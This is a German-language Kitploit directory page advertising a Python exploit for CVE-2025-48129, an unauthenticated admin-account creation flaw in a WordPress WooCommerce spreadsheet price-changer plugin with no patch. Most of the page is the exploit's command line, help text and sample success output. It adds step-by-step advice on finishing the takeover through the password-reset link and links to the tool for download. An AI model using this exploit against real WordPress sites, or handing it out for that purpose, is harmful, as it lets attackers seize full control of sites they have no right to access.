Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 ist anfällig für Privilegieneskalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-48129
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierung
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 ist anfällig für Privilegieneskalation

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-48129 - Privilegieneskalation im WordPress Spreadsheet Price Changer Plugin

🛡️ Schwachstellenzusammenfassung

  • Betroffenes Plugin: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • Betroffene Versionen: <= 2.4.37
  • Gepatchte Version: ❌ Kein offizieller Fix verfügbar
  • Entdeckt von: Patchstack | 20. Mai 2025
  • CVE-ID: CVE-2025-48129
  • CVSS-Score: 9.8 (Kritisch)
  • Patch-Priorität: 🔴 Hoch

🔥 Risiko

Nicht authentifizierte Angreifer können Privilegien eskalieren, indem sie ein Administrator-Konto erstellen, ohne vorherigen Zugriff zu benötigen. Dies ermöglicht die vollständige Übernahme der WordPress-Seite.

Klassifiziert unter: OWASP A7 – Identifikations- und Authentifizierungsfehler


🧪 Übersicht des Exploit-Skripts

Dieses Python-Skript zielt auf anfällige Versionen des Plugins ab und registriert einen neuen WordPress-Administrator, wobei nur eine E-Mail und ein Passwort (per MD5 gehasht) verwendet werden.


▶️ Beispielverwendung

root@kitploit:~
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 Hilfe zur Verwendung

root@kitploit:~
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ Beispiel für erfolgreiche Ausgabe

root@kitploit:~
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ Wichtiger Hinweis

In einigen Fällen kann das direkte Einloggen mit dem gewählten Passwort fehlschlagen.
Dies ist kein Fehler im Exploit, sondern eine Folge davon, wie das verwundbare Plugin gehashte Passwörter an das interne Benutzererstellungssystem von WordPress übergibt.

Wenn Sie sich nicht anmelden können, setzen Sie das Passwort einfach per E-Mail zurück, indem Sie die folgende URL verwenden:

root@kitploit:~
http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPress sendet eine E-Mail zum Zurücksetzen des Passworts an das soeben erstellte Administrator-Konto – wodurch Sie vollen Zugriff erhalten.


🧾 Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken bereitgestellt.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden.


Von: Nxploited (Khaled_alenazi)

Tool herunterladen